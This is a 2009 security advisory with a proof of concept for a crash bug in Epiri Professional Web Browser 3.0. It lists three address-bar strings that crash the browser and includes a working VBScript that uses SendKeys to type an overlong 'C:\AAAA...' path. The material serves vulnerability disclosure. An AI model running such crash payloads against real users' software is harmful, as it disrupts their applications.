Epiri Professional Web Browser 3.0 Remote Crash Exploit

2009-07-30T00:00:00
ID ZSL-2009-4923
Type zeroscience
Reporter Gjoko Krstic
Modified 2009-07-30T00:00:00

Description

Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit
Advisory ID: ZSL-2009-4923
Type: Local/Remote
Impact: DoS
Risk: (2/5)
Release Date: 30.07.2009

Summary

Epiri Professional 3.0 next generation alternative internet Epiri Professional features with faster internet, digital clarity, the latest technological design and user-focused, impressive, next generation alternative internet program. Microsoft Silverlight needed.

Description

Epiri Professional Web Browser suffers from a denial of service vulnerability that crashes the application by typiing one of the 3 vulnerable strings into the address bar ('file://', 'C::' and 'C:AAAA..AAA[257]) or by opening a malicious .vbs script file localy or remotely. Vulnerable Mode: Browse Internet.

Vendor

Horizon Software Co. - <http://www.horizonum.com>

Affected Version

3.0.0.00

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

N/A

PoC

epiri_crash.vbs

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
Exploit coded by sm - <sm@zeroscience.mk>

References

[1] <http://securityreason.com/exploitalert/6777>
[2] <http://www.packetstormsecurity.org/filedesc/epiri-dos.txt.html>
[3] <http://www.milw0rm.com/exploits/9304>
[4] http://sebug.net/exploit/11951

Changelog

[30.07.2009] - Initial release

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            ' Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit

' Vendor: Horizon
' Product Web Page: http://www.horizonum.com/
' Current Version: 3.0.0.00
' Notiz: Microsoft Silverlight
' Vulnerable Mode: Browse Internet
' Tested On Microsoft Windows XP Professional SP3 (En)

' Vulnerable strings:

' file://
' C::
' C:\AAAA...AAAA [257]
'

' Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
' liquidworm gmail com
' http://www.zeroscience.org/
' 28.07.2009


' Working PoC: http://zeroscience.org/codes/epiri_crash.vbs

Dim crash

Set crash = CreateObject("WScript.Shell")

With crash

Do Until Success = True

Success = crash.AppActivate("Epiri Professional 3.0")

Loop

'.SendKeys "file://"
'.SendKeys "C::"
.SendKeys "C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

.SendKeys "~" 'Return

End With

Wscript.Quit